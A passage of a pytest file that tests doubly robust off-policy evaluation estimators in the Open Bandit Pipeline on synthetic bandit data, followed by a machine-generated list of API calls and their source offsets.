if k in ["reward", "action", "pscore", "position"]
}
input_dict["action_dist"] = action_dist
input_dict["estimated_rewards_by_reg_model"] = expected_reward
dm_value = dm.estimate_policy_value(**input_dict)
dr_value = dr.estimate_policy_value(**input_dict)
dr_shrink_0_value = dr_shrink_0.estimate_policy_value(**input_dict)
dr_shrink_max_value = dr_shrink_max.estimate_policy_value(**input_dict)
assert (
dm_value == dr_shrink_0_value
), "DoublyRobustWithShrinkage (lambda=0) should be the same as DirectMethod"
assert (
np.abs(dr_value - dr_shrink_max_value) < 1e-5
), "DoublyRobustWithShrinkage (lambda=inf) should be almost the same as DoublyRobust"
# prepare input dict
input_tensor_dict = {
k: v if v is None else torch.from_numpy(v)
for k, v in synthetic_bandit_feedback.items()
if k in ["reward", "action", "pscore", "position"]
}
input_tensor_dict["action_dist"] = torch.from_numpy(action_dist)
input_tensor_dict["estimated_rewards_by_reg_model"] = torch.from_numpy(
expected_reward
)
dm_value = dm.estimate_policy_value_tensor(**input_tensor_dict)
dr_value = dr.estimate_policy_value_tensor(**input_tensor_dict)
dr_shrink_0_value = dr_shrink_0.estimate_policy_value_tensor(**input_tensor_dict)
dr_shrink_max_value = dr_shrink_max.estimate_policy_value_tensor(
**input_tensor_dict
)
assert (
dm_value.item() == dr_shrink_0_value.item()
), "DoublyRobustWithShrinkage (lambda=0) should be the same as DirectMethod"
assert (
np.abs(dr_value.item() - dr_shrink_max_value.item()) < 1e-5
), "DoublyRobustWithShrinkage (lambda=inf) should be almost the same as DoublyRobust"
def test_switch_dr_using_random_evaluation_policy(
synthetic_bandit_feedback: BanditFeedback, random_action_dist: np.ndarray
) -> None:
"""
Test the switch_dr using synthetic bandit data and random evaluation policy
"""
expected_reward = synthetic_bandit_feedback["expected_reward"][:, :, np.newaxis]
action_dist = random_action_dist
# prepare input dict
input_dict = {
k: v
for k, v in synthetic_bandit_feedback.items()
if k in ["reward", "action", "pscore", "position"]
}
input_dict["action_dist"] = action_dist
input_dict["estimated_rewards_by_reg_model"] = expected_reward
dm_value = dm.estimate_policy_value(**input_dict)
dr_value = dr.estimate_policy_value(**input_dict)
switch_dr_0_value = switch_dr_0.estimate_policy_value(**input_dict)
switch_dr_max_value = switch_dr_max.estimate_policy_value(**input_dict)
assert (
dm_value == switch_dr_0_value
), "SwitchDR (tau=0) should be the same as DirectMethod"
assert (
dr_value == switch_dr_max_value
), "SwitchDR (tau=1e10) should be the same as DoublyRobust"
|
[
"torch.ones",
"numpy.random.uniform",
"obp.ope.SelfNormalizedDoublyRobust",
"numpy.abs",
"conftest.generate_action_dist",
"numpy.zeros",
"numpy.ones",
"re.escape",
"obp.ope.DoublyRobustWithShrinkage",
"pytest.raises",
"obp.ope.SwitchDoublyRobust",
"numpy.arange",
"numpy.random.choice",
"torch.zeros",
"pytest.mark.parametrize",
"obp.ope.DoublyRobust",
"obp.ope.DirectMethod",
"torch.from_numpy"
] |
[((310, 324), 'obp.ope.DirectMethod', 'DirectMethod', ([], {}), '()\n', (322, 324), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((330, 344), 'obp.ope.DoublyRobust', 'DoublyRobust', ([], {}), '()\n', (342, 344), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((359, 397), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': '(0.0)'}), '(lambda_=0.0)\n', (384, 397), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((414, 462), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': '(10000000000.0)'}), '(lambda_=10000000000.0)\n', (439, 462), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((461, 489), 'obp.ope.SelfNormalizedDoublyRobust', 'SelfNormalizedDoublyRobust', ([], {}), '()\n', (487, 489), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((504, 531), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': '(0.0)'}), '(tau=0.0)\n', (522, 531), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((548, 585), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': '(10000000000.0)'}), '(tau=10000000000.0)\n', (566, 585), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((5200, 5348), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description"""', 'invalid_input_of_dr'], {}), "(\n 'action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description'\n , invalid_input_of_dr)\n", (5223, 5348), False, 'import pytest\n'), ((12126, 12281), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description"""', 'invalid_input_tensor_of_dr'], {}), "(\n 'action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description'\n , invalid_input_tensor_of_dr)\n", (12149, 12281), False, 'import pytest\n'), ((13281, 13349), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""tau, description"""', 'invalid_input_of_switch'], {}), "('tau, description', invalid_input_of_switch)\n", (13304, 13349), False, 'import pytest\n'), ((13623, 13689), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""tau, description"""', 'valid_input_of_switch'], {}), "('tau, description', valid_input_of_switch)\n", (13646, 13689), False, 'import pytest\n'), ((14060, 14135), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""lambda_, description"""', 'invalid_input_of_shrinkage'], {}), "('lambda_, description', invalid_input_of_shrinkage)\n", (14083, 14135), False, 'import pytest\n'), ((14442, 14515), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""lambda_, description"""', 'valid_input_of_shrinkage'], {}), "('lambda_, description', valid_input_of_shrinkage)\n", (14465, 14515), False, 'import pytest\n'), ((15021, 15192), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description"""', 'valid_input_of_dr_variants'], {}), "(\n 'action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description'\n , valid_input_of_dr_variants)\n", (15044, 15192), False, 'import pytest\n'), ((16452, 16630), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description"""', 'valid_input_tensor_of_dr_variants'], {}), "(\n 'action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description'\n , valid_input_tensor_of_dr_variants)\n", (16475, 16630), False, 'import pytest\n'), ((13787, 13814), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': 'tau'}), '(tau=tau)\n', (13805, 13814), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((14620, 14662), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': 'lambda_'}), '(lambda_=lambda_)\n', (14645, 14662), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((15514, 15552), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': 'hyperparameter'}), '(tau=hyperparameter)\n', (15532, 15552), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((15565, 15614), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': 'hyperparameter'}), '(lambda_=hyperparameter)\n', (15590, 15614), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((16967, 17016), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': 'hyperparameter'}), '(lambda_=hyperparameter)\n', (16992, 17016), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((19122, 19151), 'torch.from_numpy', 'torch.from_numpy', (['action_dist'], {}), '(action_dist)\n', (19138, 19151), False, 'import torch\n'), ((19210, 19243), 'torch.from_numpy', 'torch.from_numpy', (['expected_reward'], {}), '(expected_reward)\n', (19226, 19243), False, 'import torch\n'), ((22273, 22302), 'torch.from_numpy', 'torch.from_numpy', (['action_dist'], {}), '(action_dist)\n', (22289, 22302), False, 'import torch\n'), ((22361, 22394), 'torch.from_numpy', 'torch.from_numpy', (['expected_reward'], {}), '(expected_reward)\n', (22377, 22394), False, 'import torch\n'), ((24309, 24338), 'torch.from_numpy', 'torch.from_numpy', (['action_dist'], {}), '(action_dist)\n', (24325, 24338), False, 'import torch\n'), ((24397, 24430), 'torch.from_numpy', 'torch.from_numpy', (['expected_reward'], {}), '(expected_reward)\n', (24413, 24430), False, 'import torch\n'), ((792, 821), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (812, 821), False, 'from conftest import generate_action_dist\n'), ((845, 867), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (853, 867), True, 'import numpy as np\n'), ((877, 887), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (884, 887), True, 'import numpy as np\n'), ((897, 924), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (913, 924), True, 'import numpy as np\n'), ((934, 953), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (942, 953), True, 'import numpy as np\n'), ((1010, 1039), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1030, 1039), False, 'from conftest import generate_action_dist\n'), ((1049, 1071), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1057, 1071), True, 'import numpy as np\n'), ((1095, 1105), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (1102, 1105), True, 'import numpy as np\n'), ((1115, 1142), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (1131, 1142), True, 'import numpy as np\n'), ((1152, 1171), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (1160, 1171), True, 'import numpy as np\n'), ((1228, 1257), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1248, 1257), False, 'from conftest import generate_action_dist\n'), ((1267, 1289), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1275, 1289), True, 'import numpy as np\n'), ((1299, 1321), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1307, 1321), True, 'import numpy as np\n'), ((1345, 1372), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (1361, 1372), True, 'import numpy as np\n'), ((1382, 1401), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (1390, 1401), True, 'import numpy as np\n'), ((1458, 1487), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1478, 1487), False, 'from conftest import generate_action_dist\n'), ((1497, 1519), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1505, 1519), True, 'import numpy as np\n'), ((1529, 1551), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1537, 1551), True, 'import numpy as np\n'), ((1561, 1571), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (1568, 1571), True, 'import numpy as np\n'), ((1581, 1608), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (1597, 1608), True, 'import numpy as np\n'), ((1703, 1732), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1723, 1732), False, 'from conftest import generate_action_dist\n'), ((1742, 1766), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'float'}), '(5, dtype=float)\n', (1750, 1766), True, 'import numpy as np\n'), ((1776, 1798), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1784, 1798), True, 'import numpy as np\n'), ((1808, 1818), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (1815, 1818), True, 'import numpy as np\n'), ((1828, 1855), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (1844, 1855), True, 'import numpy as np\n'), ((1865, 1884), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (1873, 1884), True, 'import numpy as np\n'), ((1964, 1993), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1984, 1993), False, 'from conftest import generate_action_dist\n'), ((2039, 2061), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2047, 2061), True, 'import numpy as np\n'), ((2071, 2081), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (2078, 2081), True, 'import numpy as np\n'), ((2091, 2118), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (2107, 2118), True, 'import numpy as np\n'), ((2128, 2147), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (2136, 2147), True, 'import numpy as np\n'), ((2227, 2256), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (2247, 2256), False, 'from conftest import generate_action_dist\n'), ((2279, 2301), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2287, 2301), True, 'import numpy as np\n'), ((2311, 2321), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (2318, 2321), True, 'import numpy as np\n'), ((2331, 2358), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (2347, 2358), True, 'import numpy as np\n'), ((2368, 2387), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (2376, 2387), True, 'import numpy as np\n'), ((2444, 2473), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (2464, 2473), False, 'from conftest import generate_action_dist\n'), ((2483, 2510), 'numpy.zeros', 'np.zeros', (['(3, 2)'], {'dtype': 'int'}), '((3, 2), dtype=int)\n', (2491, 2510), True, 'import numpy as np\n'), ((2520, 2542), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2528, 2542), True, 'import numpy as np\n'), ((2552, 2562), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (2559, 2562), True, 'import numpy as np\n'), ((2572, 2599), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (2588, 2599), True, 'import numpy as np\n'), ((2609, 2628), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (2617, 2628), True, 'import numpy as np\n'), ((2691, 2720), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (2711, 2720), False, 'from conftest import generate_action_dist\n'), ((2766, 2788), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2774, 2788), True, 'import numpy as np\n'), ((2798, 2808), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (2805, 2808), True, 'import numpy as np\n'), ((2818, 2845), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (2834, 2845), True, 'import numpy as np\n'), ((2855, 2874), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (2863, 2874), True, 'import numpy as np\n'), ((2981, 3010), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3001, 3010), False, 'from conftest import generate_action_dist\n'), ((3020, 3042), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3028, 3042), True, 'import numpy as np\n'), ((3065, 3075), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (3072, 3075), True, 'import numpy as np\n'), ((3085, 3112), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (3101, 3112), True, 'import numpy as np\n'), ((3122, 3141), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (3130, 3141), True, 'import numpy as np\n'), ((3198, 3227), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3218, 3227), False, 'from conftest import generate_action_dist\n'), ((3237, 3259), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3245, 3259), True, 'import numpy as np\n'), ((3269, 3296), 'numpy.zeros', 'np.zeros', (['(3, 2)'], {'dtype': 'int'}), '((3, 2), dtype=int)\n', (3277, 3296), True, 'import numpy as np\n'), ((3306, 3316), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (3313, 3316), True, 'import numpy as np\n'), ((3326, 3353), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (3342, 3353), True, 'import numpy as np\n'), ((3363, 3382), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (3371, 3382), True, 'import numpy as np\n'), ((3445, 3474), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3465, 3474), False, 'from conftest import generate_action_dist\n'), ((3484, 3506), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3492, 3506), True, 'import numpy as np\n'), ((3516, 3538), 'numpy.zeros', 'np.zeros', (['(4)'], {'dtype': 'int'}), '(4, dtype=int)\n', (3524, 3538), True, 'import numpy as np\n'), ((3548, 3558), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (3555, 3558), True, 'import numpy as np\n'), ((3568, 3595), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (3584, 3595), True, 'import numpy as np\n'), ((3605, 3624), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (3613, 3624), True, 'import numpy as np\n'), ((3699, 3728), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3719, 3728), False, 'from conftest import generate_action_dist\n'), ((3738, 3760), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3746, 3760), True, 'import numpy as np\n'), ((3770, 3792), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3778, 3792), True, 'import numpy as np\n'), ((3815, 3842), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (3831, 3842), True, 'import numpy as np\n'), ((3852, 3871), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (3860, 3871), True, 'import numpy as np\n'), ((3928, 3957), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3948, 3957), False, 'from conftest import generate_action_dist\n'), ((3967, 3989), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3975, 3989), True, 'import numpy as np\n'), ((3999, 4021), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4007, 4021), True, 'import numpy as np\n'), ((4031, 4046), 'numpy.ones', 'np.ones', (['(5, 3)'], {}), '((5, 3))\n', (4038, 4046), True, 'import numpy as np\n'), ((4056, 4083), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (4072, 4083), True, 'import numpy as np\n'), ((4093, 4112), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (4101, 4112), True, 'import numpy as np\n'), ((4175, 4204), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (4195, 4204), False, 'from conftest import generate_action_dist\n'), ((4214, 4236), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4222, 4236), True, 'import numpy as np\n'), ((4246, 4268), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4254, 4268), True, 'import numpy as np\n'), ((4278, 4288), 'numpy.ones', 'np.ones', (['(4)'], {}), '(4)\n', (4285, 4288), True, 'import numpy as np\n'), ((4298, 4325), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (4314, 4325), True, 'import numpy as np\n'), ((4335, 4354), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (4343, 4354), True, 'import numpy as np\n'), ((4438, 4467), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (4458, 4467), False, 'from conftest import generate_action_dist\n'), ((4477, 4499), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4485, 4499), True, 'import numpy as np\n'), ((4509, 4531), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4517, 4531), True, 'import numpy as np\n'), ((4541, 4553), 'numpy.arange', 'np.arange', (['(5)'], {}), '(5)\n', (4550, 4553), True, 'import numpy as np\n'), ((4563, 4590), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (4579, 4590), True, 'import numpy as np\n'), ((4600, 4619), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (4608, 4619), True, 'import numpy as np\n'), ((4677, 4706), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (4697, 4706), False, 'from conftest import generate_action_dist\n'), ((4716, 4738), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4724, 4738), True, 'import numpy as np\n'), ((4748, 4770), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4756, 4770), True, 'import numpy as np\n'), ((4780, 4790), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (4787, 4790), True, 'import numpy as np\n'), ((4800, 4827), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (4816, 4827), True, 'import numpy as np\n'), ((4837, 4856), 'numpy.zeros', 'np.zeros', (['(5, 4, 2)'], {}), '((5, 4, 2))\n', (4845, 4856), True, 'import numpy as np\n'), ((4965, 4994), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (4985, 4994), False, 'from conftest import generate_action_dist\n'), ((5004, 5026), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (5012, 5026), True, 'import numpy as np\n'), ((5036, 5058), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (5044, 5058), True, 'import numpy as np\n'), ((5068, 5078), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (5075, 5078), True, 'import numpy as np\n'), ((5088, 5115), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (5104, 5115), True, 'import numpy as np\n'), ((6686, 6719), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (6697, 6719), False, 'import torch\n'), ((6729, 6742), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (6739, 6742), False, 'import torch\n'), ((6807, 6829), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (6818, 6829), False, 'import torch\n'), ((6942, 6975), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (6953, 6975), False, 'import torch\n'), ((6999, 7012), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (7009, 7012), False, 'import torch\n'), ((7077, 7099), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (7088, 7099), False, 'import torch\n'), ((7212, 7245), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7223, 7245), False, 'import torch\n'), ((7255, 7288), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7266, 7288), False, 'import torch\n'), ((7367, 7389), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (7378, 7389), False, 'import torch\n'), ((7502, 7535), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7513, 7535), False, 'import torch\n'), ((7545, 7578), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7556, 7578), False, 'import torch\n'), ((7588, 7601), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (7598, 7601), False, 'import torch\n'), ((7807, 7842), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.float32'}), '(5, dtype=torch.float32)\n', (7818, 7842), False, 'import torch\n'), ((7852, 7885), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7863, 7885), False, 'import torch\n'), ((7895, 7908), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (7905, 7908), False, 'import torch\n'), ((7973, 7995), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (7984, 7995), False, 'import torch\n'), ((8179, 8212), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (8190, 8212), False, 'import torch\n'), ((8222, 8235), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (8232, 8235), False, 'import torch\n'), ((8300, 8322), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (8311, 8322), False, 'import torch\n'), ((8472, 8505), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (8483, 8505), False, 'import torch\n'), ((8515, 8528), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (8525, 8528), False, 'import torch\n'), ((8593, 8615), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (8604, 8615), False, 'import torch\n'), ((8728, 8766), 'torch.zeros', 'torch.zeros', (['(3, 2)'], {'dtype': 'torch.int64'}), '((3, 2), dtype=torch.int64)\n', (8739, 8766), False, 'import torch\n'), ((8776, 8809), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (8787, 8809), False, 'import torch\n'), ((8819, 8832), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (8829, 8832), False, 'import torch\n'), ((8897, 8919), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (8908, 8919), False, 'import torch\n'), ((9086, 9119), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9097, 9119), False, 'import torch\n'), ((9129, 9142), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (9139, 9142), False, 'import torch\n'), ((9207, 9229), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (9218, 9229), False, 'import torch\n'), ((9393, 9426), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9404, 9426), False, 